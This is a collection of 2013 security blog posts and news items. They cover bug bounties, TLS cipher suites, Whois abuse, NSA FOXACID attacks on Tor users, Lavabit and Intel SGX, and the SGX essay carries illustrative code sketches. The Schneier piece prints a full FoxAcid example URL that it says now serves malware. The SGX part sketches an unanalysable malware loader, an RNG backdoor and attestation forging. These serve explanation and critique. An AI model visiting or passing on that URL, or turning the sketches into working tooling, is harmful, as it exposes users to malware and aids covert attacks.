Microsoft’s reward program was announced in June after many years of speculation by security researchers about the company’s intentions. Microsoft officials had said in the past that the company didn’t need to pay rewards for vulnerabilities because many researchers came directly to Microsoft with details of new vulnerabilities. That state of affairs changed over the course of the last year or so, leading Microsoft to establish its own take on the bug bounty programs run by many other software vendors.

Unlike Google, PayPal and others, Microsoft’s program–outside of the IE 11 reward–is mainly geared toward paying for innovative attack techniques. The company is offering as much as $100,000 for offensive techniques that are capable of bypassing the latest exploit mitigation technologies on the newest version of Windows. That program is still ongoing.

Among the other researchers who received rewards from Microsoft in the IE 11 program are Peter Vreugdenhill of Exploit Intelligence, Fermin J. Serna of Google, Masato Kinugawa, Ivan Fratric of Google and Jose Antonio Vazquez Gonzalez of Yenteasy Security Research.

The $28,000 Microsoft paid during the IE 11 program isn’t a big number in the grand scheme of things, particularly when compared to the tens of thousands of dollars Google pays out on a regular basis for Chrome bugs. But the researchers who submitted bugs to the program are a good indication that the security community is taking Microsoft’s program seriously, despite the relatively low payments available.


09 Oct 19:28

ChaCha20 and Poly1305 for TLS

Today, TLS connections predominantly use one of two families of cipher suites: RC4 based or AES-CBC based. However, in recent years both of these families of cipher suites have suffered major problems. TLS's CBC construction was the subject of the BEAST attack (fixed with 1/n-1 record splitting or TLS 1.1) and Lucky13 (fixed with complex implementation tricks). RC4 was found to have key-stream biases that cannot effectively be fixed.

Although AES-CBC is currently believed to be secure when correctly implemented, a correct implementation is so complex that there remains strong motivation to replace it.

Clearly we need something better. An obvious alternative is AES-GCM (AES-GCM is AES in counter mode with a polynomial authenticator over GF(2^128)), which is already specified for TLS and has some implementations. Support for it is in the latest versions of OpenSSL and it has been the top preference cipher of Google servers for some time now. Chrome support should be coming in Chrome 31, which is expected in November. (Although we're still fighting to get TLS 1.2 support deployed in Chrome 30 due to buggy servers.)

AES-GCM isn't perfect, however. Firstly, implementing AES and GHASH (the authenticator part of GCM) in software in a way which is fast, secure and has good key agility is very difficult. Both primitives are suited to hardware implementations and good software implementations are worthy of conference papers. The fact that a naive implementation (which is also what's recommended in the standard for GHASH!) leaks timing information is a problem.

AES-GCM also isn't very quick on lower-powered devices such as phones, and phones are now a very important class of device. A standard phone (which is always defined by whatever I happen to have in my pocket; a Galaxy Nexus at the moment) can do AES-128-GCM at only 25MB/s and AES-256-GCM at 20MB/s (both measured with an 8KB block size).

Lastly, if we left things as they are, AES-GCM would be the only good cipher suite in TLS. While there are specifications for AES-CCM and for fixing the AES-CBC construction, they are all AES based and, in the past, having some diversity in cipher suites has proven useful. So we would be looking for an alternative even if AES-GCM were perfect.

In light of this, Google servers and Chrome will soon be supporting cipher suites based around ChaCha20 and Poly1305. These are primitives developed by Dan Bernstein and are fast, secure, have high quality, public domain implementations, are naturally constant time and have nearly perfect key agility.

On the same phone as the AES-GCM speeds were measured, the ChaCha20+Poly1305 cipher suite runs at 92MB/s (which should be compared against the AES-256-GCM speed as ChaCha20 is a 256-bit cipher).

In addition to support in Chrome and on Google's servers, my colleague Elie Bursztein and I are working on patches for NSS and OpenSSL to support this cipher suite. (And I should thank Dan Bernstein, Andrew M, Ted Krovetz and Peter Schwabe for their excellent, public domain implementations of these algorithms. Also Ben Laurie and Wan-Teh Chang for code reviews, suggestions etc.)

But while AES-GCM's hardware orientation is troublesome for software implementations, it's obviously good news for hardware implementations and some systems do have hardware AES-GCM support. Most notably, Intel chips have had such support (which they call AES-NI) since Westmere. Where such support exists, it would be a shame not to use it because it's constant time and very fast (see slide 17). So, once ChaCha20+Poly1305 is running, I hope to have clients change their cipher suite preferences depending on the hardware that they're running on, so that, in cases where both client and server support AES-GCM in hardware, it'll be used.
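A rough sketch of that kind of hardware-dependent preference selection follows. The CPUID check is the standard x86 feature-bit test for AES-NI (assuming a GCC or Clang toolchain); the preference strings are purely illustrative and not any particular library's API:

#include <stdio.h>
#include <cpuid.h>   /* GCC/Clang CPUID helpers: __get_cpuid(), bit_AES */

/* Returns non-zero if the CPU advertises AES-NI (leaf 1, ECX bit 25). */
static int has_aes_ni(void)
{
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return 0;
    return (ecx & bit_AES) != 0;
}

int main(void)
{
    /* Prefer AES-GCM where the hardware makes it fast and constant time;
     * otherwise put ChaCha20+Poly1305 first. The strings are illustrative. */
    const char *preference = has_aes_ni()
        ? "ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-CHACHA20-POLY1305"
        : "ECDHE-RSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-GCM-SHA256";

    printf("Preferred cipher suites: %s\n", preference);
    return 0;
}

In a real client the TLS library's own preference-ordering mechanism would be used; the only point here is that the ordering can key off the AES-NI bit.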

To wrap all this up, we need to solve a long-standing browser TLS problem: in order to deal with buggy HTTPS servers on the Internet (of which there are many, sadly), browsers will retry failed HTTPS connections with lower TLS version numbers in order to try to find a version that doesn't trigger the problem. As a last attempt, they'll try an SSLv3 connection with no extensions.

Several useful features get jettisoned when this occurs but the important one for security, up until now, has been that elliptic curve support is disabled in SSLv3. For servers that support ECDHE but not DHE that means that a network attacker can trigger version downgrades and remove forward security from a connection. Now that AES-GCM and ChaCha20+Poly1305 are important we have to worry about them too as these cipher suites are only defined for TLS 1.2.

Something needs to be done to fix this so, with Chrome 31, Chrome will no longer downgrade to SSLv3 for Google servers. In this experiment, Google servers are being used as an example of non-buggy servers. The experiment hopes to show that networks are sufficiently transparent that they'll let at least TLS 1.0 through. We know from Chrome's statistics that connections to Google servers do end up getting downgraded to SSLv3 sometimes, but all sorts of random network events can trigger a downgrade. The fear is that there's some common network element that blocks TLS connections by deep-packet inspection, which we'll measure by breaking them and seeing how many bug reports we get.

If that works then, in Chrome 32, no fallbacks will be permitted for Google servers at all. This stage of the experiment tests that the network is transparent to TLS 1.2 by, again, breaking anything that isn't and seeing if it causes bug reports.

If both those experiments work then, great! We can define a way for servers to securely indicate that they don't need version fallback. It would be nice to have used the renegotiation extension for this, but I think that there are likely already too many broken servers that support that, so another SCSV is probably needed.

If we get all of the above working then we're not in too bad a state with respect to TLS cipher suites. At least, once most of the world has upgraded in any case.

07 Oct 13:25

A Study of Whois Privacy and Proxy Service Abuse

by Richard Clayton

ICANN have now published a draft for public comment of “A Study of Whois Privacy and Proxy Service Abuse“. I am the primary author of this report — the work being done whilst I was collaborating with the National Physical Laboratory (NPL) under EPSRC Grant EP/H018298/1.

This particular study was originally proposed by ICANN in 2010, one of several that were to examine the impact of domain registrants using privacy services (where the name of a domain registrant is published, but contact details are kept private) and proxy services (where even the domain licensee’s name is not made available on the public database).

ICANN wanted to know whether a significant percentage of the domain names used to conduct illegal or harmful Internet activities are registered via privacy or proxy services to obscure the perpetrator’s identity. No surprises in our results: they are!

However, it’s more interesting to ask whether this percentage is somewhat higher than the usage of privacy or proxy services for entirely lawful and harmless Internet activities? This turned out NOT to be the case — for example banks use privacy and proxy services almost as often as the registrants of domains used in the hosting of child sexual abuse images; and the registrants of domains used to host (legal) adult pornography use privacy and proxy services more often than most (but not all) of the different types of malicious activity that we studied.

It’s also relevant to consider what other methods might be chosen by those involved in criminal activity to obscure their identities, because in the event of changes to privacy and proxy services, it is likely that they will turn to these alternatives.

Accordingly, we determined experimentally whether a significant percentage of the domain names we examined have been registered with incorrect Whois contact information – and specifically whether or not we could reach the domain registrant using a phone number from the Whois information. We asked them a single question in their native language: “Did you register this domain?”

We got somewhat variable results from our phone survey — but the pattern becomes clear if we consider whether there is any a priori hope at all of ringing up the domain registrant.

If we sum up the likelihoods:

  • uses privacy or proxy service
  • no (apparently valid) phone number in whois
  • number is apparently valid, but fails to connect
  • number reaches someone other than the registrant

then we find that for legal and harmless activities the probability of a phone call not being possible ranges between 24% (legal pharmacies on the Legitscript list) and 62% (owners of lawful websites that someone has broken into and installed phishing pages). For malicious activities the probability of failure is 88% or more, with typosquatting (which is a civil matter, rather than a criminal one) sitting at 68% (some of the typosquatters want to hide, some do not).

There’s lots of detail and supporting statistics in the report… and an executive summary for the time-challenged. It will provide real data, rather than just speculative anecdotes, to inform the debate around reforming Whois — and the difficulties of doing so.

07 Oct 13:17

How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

by schneier

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA's application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency's partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates "fingerprints" that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see "almost everything" a target does on the Internet.

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, and the fact that all Tor users look alike on the Internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user's computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

According to the training presentation provided by Snowden, EgotisticalGiraffe exploits a type confusion vulnerability in E4X, which is an XML extension for JavaScript. This vulnerability exists in Firefox 11.0 -- 16.0.2, as well as Firefox 10.0 ESR -- the Firefox version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EgotisticalGiraffe was inadvertently fixed when Mozilla removed the E4X library with the vulnerability, and when Tor added that Firefox version into the Tor browser bundle, but NSA were confident that they would be able to find a replacement Firefox exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FoxAcid server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can react faster than other websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the legitimate website can respond, thereby tricking the target's browser to visit a Foxacid server.

In the academic literature, these are called "man-in-the-middle" attacks, and have been known to the commercial and academic security communities. More specifically, they are examples of "man-on-the-side" attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a "race condition" between the NSA server and the legitimate website. This top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FoxAcid server. An article in the German magazine Spiegel, based on additional top secret Snowden documents, mentions an NSA developed attack technology with the name of QuantumInsert that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to "degrade/deny/disrupt Tor access".

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FoxAcid system

According to various top-secret documents provided by Snowden, FoxAcid is the NSA codename for what the NSA calls an "exploit orchestrator," an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA's tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FoxAcid server with a special URL, called a FoxAcid tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FoxAcid tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/bins/1/define/forms9952_z1zzz.html is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There is no currently registered domain name by that name; it is just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FoxAcid server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FoxAcid server to know exactly who the target is when his computer contacts it.

According to Snowden, FoxAcid is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target's technical sophistication, the value of the exploit, and other considerations.

In the case of Tor users, FoxAcid might use EgotisticalGiraffe against their Firefox browsers.

FoxAcid servers also have sophisticated capabilities to avoid detection and to ensure successful infection of its targets. One of the top-secret documents provided by Snowden demonstrates how FoxAcid can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are made in part by the technical sophistication of the target and the security software installed on the target computer, called Personal Security Products or PSP, in the manual.

FoxAcid payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

The operations manual also states that a FoxAcid payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

The NSA also uses phishing attacks to induce users to click on FoxAcid tags.

TAO additionally uses FoxAcid to exploit callbacks -- which is the general term for a computer infected by some automatic means -- calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FoxAcid servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FoxAcid server may run more exploits to ensure that the target computer remains compromised long term, as well as install "implants" designed to exfiltrate data.

By 2008, the NSA was getting so much FoxAcid callback data that they needed to build a special system to manage it all.


This essay previously appeared in the Guardian. It is the technical article associated with this more general-interest article. I also wrote two commentaries on the material.

EDITED TO ADD: Here is the source material we published. The Washington Post published its own story independently, based on some of the same source material and some new source material.

Here's the official US government response to the story.

The Guardian decided to change the capitalization of the NSA codenames. They should properly be in all caps: FOXACID, QUANTUMCOOKIE, EGOTISTICALGIRAFFE, TURMOIL, and so on.

This is the relevant quote from the Spiegel article:

According to the slides in the GCHQ presentation, the attack was directed at several Belgacom employees and involved the planting of a highly developed attack technology referred to as a "Quantum Insert" ("QI"). It appears to be a method with which the person being targeted, without their knowledge, is redirected to websites that then plant malware on their computers that can then manipulate them. Some of the employees whose computers were infiltrated had "good access" to important parts of Belgacom's infrastructure, and this seemed to please the British spies, according to the slides.

That should be "QUANTUMINSERT." This is getting frustrating. The NSA really should release a style guide for press organizations publishing their secrets.

And the URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don't click on it.

03 Oct 08:54

Lavabit got order for Snowden’s login info, then gov’t demanded site’s SSL key

by Cyrus Farivar

The American government obtained a secret order from a federal judge in Virginia demanding that Lavabit hand over its private SSL key, enabling authorities to access Edward Snowden’s e-mail—and e-mail belonging to Lavabit's 400,000 other users as well. That sealed order, dated July 10, 2013, was first published on Wednesday by Wired reporter Kevin Poulsen.

A judge at the Fourth Circuit Court of Appeals, where the case is currently being heard, unsealed the set of court documents on Wednesday.

Lavabit, the Texas-based e-mail provider, provided secure e-mail services to thousands of people, including Snowden, the former National Security Agency contractor. Neither Ladar Levison, the owner of the shuttered e-mail service, nor his attorney Jesse Binnall immediately responded to Ars’ request for comment. However, Ars also received a copy of the unsealed documents from the Lavabit defense team.

28 Sep 16:32

Thoughts on Intel's upcoming Software Guard Extensions (Part 2)

by Joanna Rutkowska

In the first part of this article, published a few weeks ago, I discussed the basics of Intel SGX technology and the challenges of using SGX to secure desktop systems, focusing on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, starting with a discussion of how it could be used to create truly irreversible software.

SGX Blackboxing – Apps and malware that cannot be reverse engineered?

A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever it leaves the processor caches and is stored in DRAM. In other words the code and data used by SGX enclaves never leave the processor in plaintext.

This feature, no doubt influenced by the DRM industry, might profoundly change our approach to who really controls our computers. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reverse engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run.

Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts:

  1. A 1st stage loader (SGX loader), which is unencrypted and whose task is to set up an SGX enclave, copy the rest of the code there (specifically the 2nd stage loader), and then start executing the 2nd stage loader...
  2. The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext.
  3. Finally, the encrypted blob, which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware).

We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protected SGX enclave and that it is the original, unmodified loader code that the application's author created. Should one bit of this loader be modified, should it be run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, the remote attestation would fail and the key would not be obtained.

And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. Nor can the key be mishandled by the code that runs in the SGX enclave, because remote attestation also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store it on the disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within the secure enclave, never leaving it, just like the key. Its data never leaves the enclave either...

One little catch is how the key is actually sent to the SGX-protected enclave so that it cannot be spoofed in the middle. Of course it must be encrypted, but to which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server – the server will then use this public key to send the actual decryption key encrypted under it. This is almost good, except for the fact that this scheme is not immune to a classic man-in-the-middle attack. The solution is easy, though – if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave – we can include the generated public key's hash as part of the data that is signed and put into the Quote message, so the remote server can also be assured that the public key originates from the actual code running in the SGX enclave and not from Mallory somewhere in the middle.
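To make the flow above concrete, here is a minimal, purely illustrative sketch. Every function in it is a hypothetical stub defined in the same file – none of this is the Intel SGX SDK API – and the hashing, attestation and decryption are simulated, so the program only demonstrates the sequence of steps such a loader would follow:

#include <stdio.h>
#include <string.h>

typedef struct { unsigned char pub[32], priv[32]; } keypair_t;
typedef struct { unsigned char report_data[64]; }  quote_t;

/* Stage 2 (inside the enclave): generate an ephemeral key pair. */
static keypair_t generate_keypair(void)
{
    keypair_t kp = { {0}, {0} };            /* stub: would be real key material */
    return kp;
}

/* Bind the hash of the public key into the quote's report data, so the remote
 * server knows the key came from this exact, unmodified enclave. */
static quote_t build_quote(const keypair_t *kp)
{
    quote_t q;
    memcpy(q.report_data, kp->pub, sizeof(kp->pub));   /* stub "hash" */
    memset(q.report_data + 32, 0, 32);
    return q;
}

/* The remote server verifies the quote and, if the enclave measurement matches
 * the author's loader, returns the payload key encrypted to kp->pub. */
static int remote_attest_and_fetch_key(const quote_t *q, unsigned char key[32])
{
    (void)q;
    memset(key, 0xAA, 32);                  /* stub: pretend the server answered */
    return 1;
}

/* Decrypt and run the payload entirely inside enclave memory. */
static void decrypt_and_run_payload(const unsigned char key[32])
{
    (void)key;
    printf("payload decrypted and executing inside the enclave (stub)\n");
}

int main(void)
{
    keypair_t kp = generate_keypair();
    quote_t   q  = build_quote(&kp);
    unsigned char payload_key[32];

    if (!remote_attest_and_fetch_key(&q, payload_key)) {
        fprintf(stderr, "attestation failed: no key, no payload\n");
        return 1;
    }
    decrypt_and_run_payload(payload_key);
    return 0;
}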

So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also “accidentally” sniff some system memory, or even read out disk sectors, and send the gathered data to a remote server, encrypted, of course? We cannot know this. And that's quite worrying, I think.

One might say that we blindly accept all proprietary software anyway – after all, who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: it could be done, and some brave souls actually do it. It could be done even if the author used some advanced form of obfuscation – it just takes a lot of time. Now, with Intel SGX, it suddenly cannot be done anymore. That's quite a revolution, a complete change of the rules. We're no longer masters of our little universe – the computer system – and now somebody else is.

Unless there was a way for “Certified Antivirus companies” to get around SGX protection.... (see below for more discussion on this).

...And some good applications of SGX

SGX blackboxing has, however, some good uses too, beyond protecting Hollywood productions and making malware un-analyzable...

One particularly attractive possibility is the “trusted cloud”, where the VMs offered to users could not be eavesdropped on or tampered with by the cloud provider's admins. I wrote about such a possibility two years ago, but with Intel SGX this could be done much, much better. This will, of course, require a specially written hypervisor which sets up an SGX container for each VM; the VM could then authenticate to the user and prove, via remote attestation, that it is executing inside a protected and properly configured SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users – we just don't care: if our code correctly attests that it is in a correct SGX enclave, it's all fine.

Suddenly Google could no longer collect and process your calendar, email, documents, and medical records! Or how about a Tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wider society of users...

Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin all this goodness... (see below for more discussion on this).

New OS and VMM architectures

In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that make use of SGX in order to protect the user's VMs against the hypervisor itself. We could go further and put other components of a VMM into protected SGX enclaves, things that we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides a convenient mechanism to build secure inter-enclave communication channels.

We could also take the “GUI domain” (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that worked well with SGX, then this would suddenly make a whole lot of sense (unlike today, where it is very challenging). What we win this way is that a bug in the hypervisor would no longer be critical: an attacker who compromised the hypervisor would still have a long way to go to steal any real secret of the user, because there are no secrets in the hypervisor itself.

In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is conceivable that the latter could be made reasonably deprivileged, in that it might only be allowed to create/remove VMs and set up networking and other policies for them, but no longer be able to read and write the memory of the VMs (Anti Snowden Protection, ASP?).

And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require a considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as of the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32, POSIX, or OSX, into a virtual machine that itself requires an orders-of-magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications.

Trusting Intel – Next Generation of Backdooring?

We have seen that SGX offers a number of attractive capabilities that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really?

The obvious question, especially in the light of recent revelations about the NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing “privileged entities” to bypass SGX protections.

Traditional CPU backdooring

Of course they could, no question about it. But one can say that Intel (as well as AMD) might have had backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago.

The problem with those “traditional” backdoors is that Intel (or a certain agency) could be caught using them, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during a forensic analysis of an incident) that doing:

MOV eax, $deadbeef
MOV ebx, $babecafe
ADD eax, ebx

...causes ring elevation for the next 1000 cycles. All the affected processors would suddenly become equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare, I think, no?

Next-generation CPU backdooring

But as more and more crypto and security mechanisms are delegated from software to the processor, it becomes more and more likely that Intel (or AMD) could insert truly “plausibly deniable” backdoors into processors.

Consider e.g. the recent paper on how to plant a backdoor into Intel's Ivy Bridge random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator, making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes to great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a “classic” view of the threat model, with Good Americans (Intel engineers) and Bad Chinese (foundry operators/employees). Nevertheless, it should be obvious that Intel could have planted such a backdoor without any of the effort or challenges described in the paper, because they could do so at any level, not necessarily below HDL.

But backdooring an RNG is still something that leaves traces. Even though the backdoored processor apparently passes all external “randomness” tests, such as the NIST test suite, it might still be caught. Perhaps because somebody buys 1000 processors, runs them for a year, notes down all the numbers generated, and then concludes that the distribution is not quite right. Or something like that. Or perhaps because somebody reverse-engineers the processor, and specifically the RNG circuitry, and notices that some gates are shorted to GND. Or perhaps because somebody at this “Bad Chinese” foundry notices it.
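
To make this concrete, here is a minimal toy sketch (in Python) of the entropy-reduction idea. It does not describe the actual Ivy Bridge DRNG or the construction from the paper; the generator, the seed size and all names are invented for illustration. The point is simply that output expanded from a tiny hidden seed passes a naive monobit frequency check (the simplest test in the NIST suite), yet anyone who knows the construction can brute-force every key derived from it.

import hashlib, os

HIDDEN_SEED_BITS = 20  # hypothetical: the backdoor leaves only 20 bits of real entropy

def backdoored_rng(seed, counter):
    # Expand the small hidden seed with a hash; the output "looks" perfectly random.
    return hashlib.sha256(seed.to_bytes(4, "big") + counter.to_bytes(8, "big")).digest()

def monobit_fraction(data):
    # Fraction of 1-bits; a truly random stream gives ~0.5, and so does this one.
    return sum(bin(b).count("1") for b in data) / (8 * len(data))

# The "victim" derives a 256-bit key from the weakened generator.
victim_seed = int.from_bytes(os.urandom(4), "big") % (1 << HIDDEN_SEED_BITS)
victim_key = backdoored_rng(victim_seed, counter=0)
print("monobit fraction:", monobit_fraction(victim_key * 1000))  # ~0.5, naive test passes

# An attacker who knows the construction simply brute-forces the tiny seed space.
for guess in range(1 << HIDDEN_SEED_BITS):
    if backdoored_rng(guess, counter=0) == victim_key:
        print("recovered hidden seed:", guess)
        break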

Let's now get back to Intel SGX – what is the actual Root of Trust for this technology? The processor, of course, just as for the old ring3/ring0 separation. But for SGX there is an additional Root of Trust used for remote attestation, namely the private key(s) used for signing the Quote messages.

If the private signing key somehow gets into the hands of an adversary, remote attestation breaks down completely. Suddenly the “SGX Blackboxed” apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also lose our attractive “trusted cloud” – now there is nothing to stop an adversary who has the private signing key from running our trusted VM outside of SGX while still reporting to us that it is SGX-protected. And so, while we believe that our trusted VM is trusted and unsniffable, and while we entrust all our deepest secrets to it, the adversary can read them all as if served on a plate.
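
Here is a minimal sketch of why a leaked Quote-signing key is fatal. Ed25519 (via the third-party cryptography package) stands in for Intel's EPID group-signature scheme, and the quote format is invented; the point is that the verifier only learns that some holder of the key signed the enclave measurement, not that the code actually ran inside an SGX enclave.

import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# The attestation key, supposed to exist only inside genuine SGX hardware.
quote_signing_key = Ed25519PrivateKey.generate()
verifier_public_key = quote_signing_key.public_key()

def make_quote(enclave_code, signing_key):
    # A "quote" binds an MRENCLAVE-like measurement of the code to a signature.
    measurement = hashlib.sha256(enclave_code).digest()
    return measurement, signing_key.sign(measurement)

def verify_quote(measurement, signature):
    try:
        verifier_public_key.verify(signature, measurement)
        return True
    except Exception:
        return False

enclave = b"my secret-handling enclave code"

# Honest case: the quote is produced by real SGX hardware.
m, sig = make_quote(enclave, quote_signing_key)
print("genuine quote verifies:", verify_quote(m, sig))

# Leaked-key case: an adversary runs the same code under a debugger or emulator,
# with no SGX protection at all, and produces an indistinguishable, valid quote.
m2, sig2 = make_quote(enclave, quote_signing_key)
print("forged quote verifies:", verify_quote(m2, sig2))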

And the worst thing is – even if somebody took such a processor, disassembled it into pieces, analyzed it transistor by transistor, recreated the HDL and analyzed it all, everything would still look fine. Because the backdoor is... the leaked private key, which is now also in the hands of the adversary, and there is no way to prove that by looking at the processor alone.

As I understand it, the whole idea of having a separate TPM chip was precisely to make such backdooring-by-leaked-keys more difficult: while we are all forced to use Intel or AMD processors today, every country could, in principle, produce its own TPM, as it is a million times less complex than a modern processor. So, perhaps, Russia could use its own TPMs and be reasonably sure that their private keys have not been handed over to the NSA.

However, as I mentioned in the first part of this article, this scheme sadly doesn't work that well: the processor can still cheat the external TPM module. For example, in the case of Intel TXT and a TPM, the processor could produce incorrect PCR values in response to a certain trigger – it then no longer matters that the TPM is trusted and its keys have not leaked, because the TPM will sign the wrong values. On the other hand, we are now back to “traditional” backdoors in the processor, whose main disadvantage is that people might get caught using them (e.g. somebody might analyze an exploit which turns out to trigger a correct Quote message despite incorrect PCRs).
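
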